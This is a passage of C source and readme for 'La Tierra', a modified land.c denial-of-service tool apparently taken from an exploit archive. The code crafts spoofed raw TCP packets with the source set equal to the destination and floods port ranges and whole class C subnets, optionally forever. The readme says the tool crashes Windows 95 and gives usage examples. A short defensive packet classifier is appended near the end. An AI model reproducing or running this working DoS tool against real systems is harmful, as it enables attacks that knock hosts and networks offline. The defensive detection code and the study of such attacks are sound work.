 printf("  (-t)   TCP flags       : ");
 strcpy(buff, "");
 if( ld.tcp_flags & TH_FIN)
  strcat(buff, "fin ");
 if( ld.tcp_flags & TH_SYN)
  strcat(buff, "syn ");
 if(ld.tcp_flags & TH_RST)
  strcat(buff, "rst ");
 if(ld.tcp_flags & TH_PUSH)
  strcat(buff, "push ");
 if(ld.tcp_flags & TH_ACK)
  strcat(buff, "ack ");
 if(ld.tcp_flags & TH_URG)
  strcat(buff, "urg ");
 printf("%s\n\n", buff);

 if(ending_port < beginning_port)
  {
  printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
  return(-8);
  }

 scan_loop = loop_val = loop;

 if(use_file)
  {
  if(access(filename, 0))
   {
   printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
   return(-9);
   }
  if( (fp = fopen(filename, "rt")) == NULL)
   {
   printf("ERROR: Unable to open %s.\n", filename);
   return(-10);
   }
  if(!get_ip(use_file, fp, buff))
   {
   printf("Unable to get any IP address from file %s.\n");
   return(-11);
   }
  strcpy(ld.dest_ip, buff);
  }

 while( (loop == FOR_EVER) ? 1 : loop-- > 0)
  {
  for(i=beginning_port; i <= ending_port; i++)
   {
   if(land(&ld, i))        /* go for it BaBy! */
    break;
     if(frequency)          /* make sure freq > 0 */
     {
    if(!ld.supress_output)
     printf("-> paused %d seconds.\n", frequency);
    sleep(frequency);
    }
   }
  if( (!use_file) && (loop && increment_addr) )
   {
   char temp_addr[21];
   if(++octet > 254)                        /* check for reset */
    {
    if(loop_val != FOR_EVER)              /* make sure not to distrute forever! */
     {
     if(++scan_loop > loop_val)        /* check if scanned x times */
      break;
     else
      loop = loop_val;                /* restore original value */
     }
    octet = 1;                           /* reset */
    }
   sprintf(temp_addr, "%s%d", class_c_addr, octet);
   strcpy(ld.dest_ip, temp_addr);

   if(!ld.supress_output)
    printf("** incrementing to next IP address: %s\n", ld.dest_ip);
   if(scan_loop > loop_val)
    break; /* break while loop */
   }
  else if(use_file)
   {
   if(!get_ip(use_file, fp, buff))
    break;

   loop++;
   strcpy(ld.dest_ip, buff);
   }
  } /* end while */
 printf("\nDone.\n\n");
} /* end main */
int  get_ip(int use_file, FILE *fp, char *buff)
{
 if(use_file == LIST_FILE)
  return(get_ip_from_list(fp, buff));

 return(get_ip_from_zone(fp, buff));
}
int get_ip_from_list(FILE *fp, char *buff)
{
 int ret_val;
 while(1)
  {
  ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
  if((ret_val == EOF) || (ret_val == (int)NULL))
   return 0;
  if( strlen(buff) >= 7)
   if((buff[0] != ';') && (buff[0] != '['))
    {
    if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
     buff[strlen(buff)-1] = 0x0;
    return 1;
    }
  }
 return 0;
}
int get_ip_from_zone(FILE *fp, char *buff)
{
 int ret_val, i;
 char *p, delim[8];
 strcpy(delim, " \t");
 while(1)
  {
  ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
  if((ret_val == EOF) || (ret_val == (int)NULL))
   return 0;
  if( strlen(buff) >= 7)
   if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
    {
    if( (p = strtok( buff, delim)) == NULL)
     continue;
    if( (p = strtok(NULL, delim)) == NULL)
     continue;
    if(strcmp(p, "A"))   /* be sure second column is a DNS A record */
     continue;

    if( (p = strtok(NULL, delim)) == NULL)
     continue;
    strcpy(buff, p);
    /* verify that we have a valid IP address to work with */
    if(inet_addr(p) == -1)
     continue;
    /* strip off trailing line characters */

    if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
     buff[strlen(buff)-1] = 0x0;
    return 1;
    }
  }
 return 0;
}
/************/
/* checksum */
/************/
u_short checksum(u_short * data,u_short length)
{
 register long value;
 u_short i;
 for(i = 0; i< (length >> 1); i++)
  value += data[i];
 if((length & 1)==1)
  value += (data[i] << 8);
 value = (value & 0xFFFF) + (value >> 16);
 return(~value);
}
/********/
/* land */
/********/
int land(LATIERRA_DATA *ld,  int port_number)
{
 struct sockaddr_in sin;
   int sock;
   char buffer[40];
   struct iphdr * ipheader = (struct iphdr *) buffer;
   struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
   struct pseudohdr pseudoheader;
 bzero(&sin,sizeof(struct sockaddr_in));
   sin.sin_family=AF_INET;
   if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
    {
      printf("ERROR: unknown host %s\n", ld->dest_ip);
      return(-1);
      }
 if((sin.sin_port=htons(port_number))==0)
    {
      printf("ERROR: unknown port %d\n",port_number);
      return(-2);
      }
 if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
    {
      printf("ERROR: couldn't allocate raw socket\n");
      return(-3);
      }
 bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->version=4;
   ipheader->ihl=sizeof(struct iphdr)/4;
   ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->id=htons(ld->sequence_number);
   ipheader->ttl = ld->ttl;
   ipheader->protocol = ld->ip_protocol;
   ipheader->saddr=sin.sin_addr.s_addr;
   ipheader->daddr=sin.sin_addr.s_addr;
   tcpheader->th_sport = sin.sin_port;
   tcpheader->th_dport = sin.sin_port;
   tcpheader->th_seq = htonl(ld->sequence_number);
   tcpheader->th_flags = ld->tcp_flags;
   tcpheader->th_off = sizeof(struct tcphdr)/4;
   tcpheader->th_win = htons(ld->window_size);
   bzero(&pseudoheader,12+sizeof(struct tcphdr));
   pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.protocol = ld->ip_protocol;
   pseudoheader.length = htons(sizeof(struct tcphdr));
   bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
   tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
   if( sendto(sock,  buffer,
       sizeof(struct iphdr)+sizeof(struct tcphdr),
       ld->message_type,
       (struct sockaddr *) &sin,
       sizeof(struct sockaddr_in) )==-1)
    {
      printf("ERROR: can't send packet. (sendto failed)\n");
      return(-4);
      }
 if(!ld->supress_output)
  printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);
   close(sock);
   return(0);
}
/* End of land */
void alternatives()
{
 printf("\nAlternative command line arguments for option -i\n\n");
 printf("    You can create two types of files that latierra can use to get\n");
 printf("    a list of IP addresses, a simple ASCII file with each IP address\n");
 printf("    appearing on each line or better yet, a DNS zone file created by\n");
 printf("    nslookup.  If you are unfamiliar with nslookup, specify a '-n' on the\n");
 printf("    command line of latierra.\n\n");
 printf("    Basically, latierra will walk down the list and send the spoofed packet\n");
 printf("    to each IP address.  Once the list is complete, and loop > 1, the list\n");
  printf("    is repeated.   To specify that the '-i' option should use a zone file,\n");
 printf("    specify \"zone=filename.txt\" instead of an IP address.  To specify a \n");
 printf("    simple ASCII list of IP addresses, use \"list=filename.txt\".  Lines\n");
 printf("    beginning with ';' or '[' are ignored.  Lines that are not an 'A' \n");
 printf("    record (second column)in a zone file will ignored.\n\n");
 exit(-1);
}
void nslookup_help()
{
 printf("\nNSLOOKUP help\n\n");

 printf("To see who is the DNS server for a particular domain, issue the following:\n");
 printf("        > set type=ns\n");
 printf("        > xyz.com\n\n");
 printf("  You will see a list of the name server(s) if completed successfully\n\n");
 printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
 printf("and issue the following commands:\n");
 printf("         > server 1.1.1.1\n");
 printf("         > ls -d xyz.com > filename.txt\n\n");
 printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
 printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n");
 exit(-1);
}
void protocol_list()
{
 printf("\nProtocol List:\n\n");
 printf("Verified:\n");
 printf("1-ICMP   2-IGMP   3-GGP  5-ST   6-TCP   7-UCL   8-EGP   9-IGP  10-BBN_RCC_MON\n");
 printf("11-NVP11   13-ARGUS   14-EMCON   15-XNET   16-CHAOS   17-UDP   18-MUX\n");
 printf("19-DCN_MEAS   20-HMP   21-PRM   22-XNS_IDP   23-TRUNK1   24-TRUNK2\n");
 printf("25-LEAF1   26-LEAF2    27-RDP   28-IRTP      29-ISO_TP4  30-NETBLT\n");
 printf("31-MFE_NSP   32-MERIT_INP   33-SEP   34-3PC   62-CFTP    64-SAT_EXPAK\n");
 printf("66-RVD       67-IPPC        69-SAT_MON   70-VISA         71-IPCV\n");
 printf("76-BR_SAT_MON   77-SUN_ND   78-WB_MON   79-WB_EXPAK   80-ISO_IP\n");
 printf("81-VMTP   82-SECURE_VMTP   83-VINES  84-TTP   85-NSFNET_IGP   86-DGP\n");
 printf("87-TCF    88-IGRP          89-OSPFIGP         90-SPRITE_RPG   91-LARP\n\n");
 printf("Supported:\n");
 printf("    6-TCP     17-UDP    (future: PPTP, SKIP) \n\n");
 exit(-1);
}
void print_arguments()
{
 printf("Arguments: \n");
 printf("     *   -i dest_ip = destination ip address such as 1.1.1.1\n");
 printf("                If last octet is '-', then the address will increment\n");
 printf("                from 1 to 254 (Class C) on the next loop\n");
 printf("                and loop must be > 1 or %d (forever).\n", FOR_EVER);
 printf("                Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
 printf("                For list of alternative options, use  -a instead of -h.\n");
 printf("     *   -b port# = beginning port number (required).\n");
 printf("         -e port# = ending port number (optional)\n");
 printf("         -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
 printf("         -v = time_to_live value, default=%d\n", DEFAULT_TTL);
 printf("         -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
 printf("         -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
 printf("         -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
 printf("         -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
 printf("         -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
 printf("         -o 1 = supress additional output to screen, default=0\n" );
 printf("         -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
 printf("     * = required     ~ = default parameter values\n\n");
 exit(-1);
}
/* End of file */

----------------- readme.txt  ------------------------------
La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net
       Modified version of land.c by m3lt, FLC
To compile latierra, type:
 gcc latierra.c -o latierra
To see the help screen, use 'latierra -h'
This program crashes Windows 95, and will cause Windows NT
4.0, SP3 to utilize a high percentage of CPU.  In some
instances, CPU usage reaches 100%.

land.c description:
land.c sends a spoofed packet with the SYN flag from the
same IP and port number as the destination.  For
example, if you want to do a DoS on 1.1.1.1, port 80, it would
spoof 1.1.1.1 port 80 as the source.  The problem with
NT4 SP3, however, is that once you issue this packet to a
port, NT4 SP3 appears to ignore all other attempts -
UNTIL ...

                     La Tierra!

La Tierra description:

La Tierra basically works by sending NT the same packet
used in land.c but to more than one port (if specified).
It doesn't appear to matter if the port is opened or closed!
NT doesn't appear to let this happen again on the same port
successively, but you simply change ports, and you can easily
go back to the original port and it'll work again. What's even
more interesting is the fact that port 139 works with this.
You would have thought - I'll leave that alone for now!
While testing, I used a Compaq dual Intel Pentium Pro 200, and
was able to take up to 64% CPU.  With one processor disabled,
CPU usage was 100%.  NT4 SP3 doesn't seem to crash, just needs
time to recover, even with one spoofed packet.
Features include:
 - Ability to launch a DoS on an entire class C address
 - Specify the beginning and ending port range
 - Specify the number of loops or make it loop forever!
 - User defined TCP flags: fin, syn, reset, push, ack,
   and urgent
 - Other IP options such as window size, time-to-live,
   sequence_number, and message_type
 - Ability to read a DNS zone file for IP addresses
 - Ability to read an ASCII file containing IP addresses
Command line options:
     -i ip_address
 DEFAULT: None
 RANGE: Valid IP Address
 OPTIONAL: No
 where ip_address is a valid ip_address, or if you wish to
 cycle through a class C address, the last octet is dropped
 and replaced with a '-'.  This option is required.  The
 source and destination address are obtained from this value.
 Rather than specifying an IP address, you may wish to create
 an ASCII file, or better yet, use nslookup to obtain all
 zone information for a particular domain.  The ASCII file
 simply contains a list of IP addresses, one on each line.
 To get a DNS file, simply use nslookup, and the
 "ls -d somedomain.com > filename.txt" command.  You can use
 'latierra -n' to read more about the command sequence for
 nslookup.
 In both types of files, lines that begin with ';' or '[' are
 ignored. In DNS files, only 'A' records are processed.
 Examples:
    Single IP Address:
  -i 10.1.2.1
    Class C range:
  -i 10.1.2.-
    ASCII file:
  -i list=filename.txt
    DNS file:
  -i zone=filename.txt
     -b beginning_port_number
 DEFAULT: None
 RANGE: Positive Integer
 OPTIONAL: No
 where this value is the port_number that latierra will use. If
 no ending_port_number is specified, ending_port_number is then
 equal to this value.  Valid range is 1 to 0xFFFF
     -e ending_port_number
 DEFAULT: If not specified, equal to beginning_port_number
 RANGE: Positive Integer
 OPTIONAL: Yes
 is the highest port number in the range to cycle through.
 Example:
  -i 10.1.2.1 -b 23 -e 80
 will start at port 23 and increment up to port 80.  You can
 delay the next increment by using the -s option.  Valid range
 is 1 to 0xFFFF
     -s seconds_between_spoofs
 DEFAULT: 1
 RANGE: Positive Integer
 OPTIONAL: Yes
 You may want to control the seconds between spoofs.  If you
 specify a zero, no delays occur.
 In the below example, the spoof will occur between ports 23 and 80,
 every 3 seconds.
  -i 10.1.2.1 -b 23 -e 80 -s 3
     -l number_of_loops

 DEFAULT: 1
 RANGE: Positive Integer, -5 loops forever
 OPTIONAL: Yes

 This option, if set greater than 1, will cause a repeat of the
 cycle.  For example:
  -i 10.1.2.1 -b 23 -e 80 -s 0 -l 8
 will cause latierra to go through ports 23 through 80 and
 repeat the process 8 times, with no delay.  Look at the
 following example:
  -i 10.1.2.- -b 23 -e 80 -s 0 -l 8
 latierra will start at 10.1.2.1, port 23 through 80, then
 increment to 10.1.2.2, port 23 through 80, and so on until
 it gets to 10.1.2.254, in which case it will repeat the
 same procedure over again 8 times.
 By specifying a value of -5 for this option, latierra will
 loop forever, until you manually stop the process.  In the
 last example above, the procedure would never end.  When it
 reaches 10.1.2.254, it falls back to 10.1.2.1 and starts
 over again from there.
 Other examples:
  -i 10.1.2.1 -b 139 -s 0 -l -5
  -i 10.1.2.- -b 80 -s 5 -l 10

     -t tcp_flags
 DEFAULT: sp   (SYN, PUSH)
 RANGE: valid character set (see below)
 OPTIONAL: Yes
 this option sets the various TCP flags, which include:
  f = fin  s = syn  r = reset
  p = push a = ack  u = urgent
 Example:
  -i 10.1.2.1 -b 139 -t apu -s 0
  To set the ack, push, and urgent flag
     -v time_to_live_value
 DEFAULT: 0xFF (255 decimal)
 RANGE: Positive Integer
 OPTIONAL: Yes
 Sets the time to live value.
     -p protocol_value
 DEFAULT: 6 (tcp)
 RANGE: Positive Integer
 OPTIONAL: Yes
 Sets the protocol value in the IP header.  To see a list of
  available protocols, run "latierra -p".
     -w window_size_value
 DEFAULT: 0xFFFF (65000 decimal)
 RANGE: Positive long value
 OPTIONAL: Yes
     -q tcp_sequence_number_value
 DEFAULT: 0xF1C
 RANGE: Positive integer
 OPTIONAL: Yes
     -o 1 supress_additional_output
 DEFAULT: messages are printed for status
 RANGE: None
 OPTIONAL: Yes
 If you don't want to see the messages during the process,
 simply use this "-o 1" to turn them off.
Final Note:
Please use this program for in-house testing purposes only.
Just because you're sending spoofed packets doesn't mean you
can't be traced.
Good luck.
- MondoMan
elmondo@usa.net

-------------------- end of file -------------------------------
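
A defender-side check for the packet pattern the readme describes, as an added example that is not part of land.c or latierra.c: it classifies a raw IPv4 datagram by whether source and destination address (and, for TCP or UDP, source and destination port) are identical. The names `classify_ipv4` and `enum verdict` and both sample datagrams are constructed for this illustration; TCP flags are ignored because latierra lets the sender choose them.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { PKT_MALFORMED = -1, PKT_OK = 0, PKT_SAME_ADDR = 1, PKT_LAND = 2 };

/* Constructed sample datagrams (20-byte IP header + 20-byte TCP header);
   checksums are left zero because the classifier does not verify them. */
static const uint8_t SAMPLE_LAND[40] = {   /* 10.1.2.1:139 -> 10.1.2.1:139, SYN */
    0x45,0x00,0x00,0x28, 0x0f,0x1c,0x00,0x00, 0xff,0x06,0x00,0x00,
    0x0a,0x01,0x02,0x01, 0x0a,0x01,0x02,0x01,
    0x00,0x8b,0x00,0x8b, 0x00,0x00,0x0f,0x1c, 0x00,0x00,0x00,0x00,
    0x50,0x02,0xff,0xff, 0x00,0x00,0x00,0x00 };
static const uint8_t SAMPLE_NORMAL[40] = { /* 10.1.2.7:1025 -> 10.1.2.1:139, SYN */
    0x45,0x00,0x00,0x28, 0x0f,0x1c,0x00,0x00, 0xff,0x06,0x00,0x00,
    0x0a,0x01,0x02,0x07, 0x0a,0x01,0x02,0x01,
    0x04,0x01,0x00,0x8b, 0x00,0x00,0x0f,0x1c, 0x00,0x00,0x00,0x00,
    0x50,0x02,0xff,0xff, 0x00,0x00,0x00,0x00 };

/* Classify one raw IPv4 datagram received from the network. */
enum verdict classify_ipv4(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return PKT_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;       /* IP header length, bytes */
    if (ihl < 20 || ihl > len)
        return PKT_MALFORMED;
    if (memcmp(pkt + 12, pkt + 16, 4) != 0)         /* saddr vs. daddr */
        return PKT_OK;
    /* Source equals destination: not expected in traffic arriving from the
       network, so it is reported even when the ports cannot be compared. */
    int has_ports = (pkt[9] == 6 || pkt[9] == 17)   /* TCP or UDP */
        && ((pkt[6] & 0x1f) | pkt[7]) == 0          /* first fragment only */
        && len >= ihl + 4;
    if (has_ports && memcmp(pkt + ihl, pkt + ihl + 2, 2) == 0)
        return PKT_LAND;                            /* sport == dport as well */
    return PKT_SAME_ADDR;
}

int main(void)
{
    printf("land sample:   %d\n", classify_ipv4(SAMPLE_LAND, sizeof SAMPLE_LAND));
    printf("normal sample: %d\n", classify_ipv4(SAMPLE_NORMAL, sizeof SAMPLE_NORMAL));
    return 0;
}
```

A filter built on this would drop both `PKT_LAND` and `PKT_SAME_ADDR` at the network edge, since the second verdict also covers fragments and protocols without ports.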



This page is part of Fyodor's exploit world.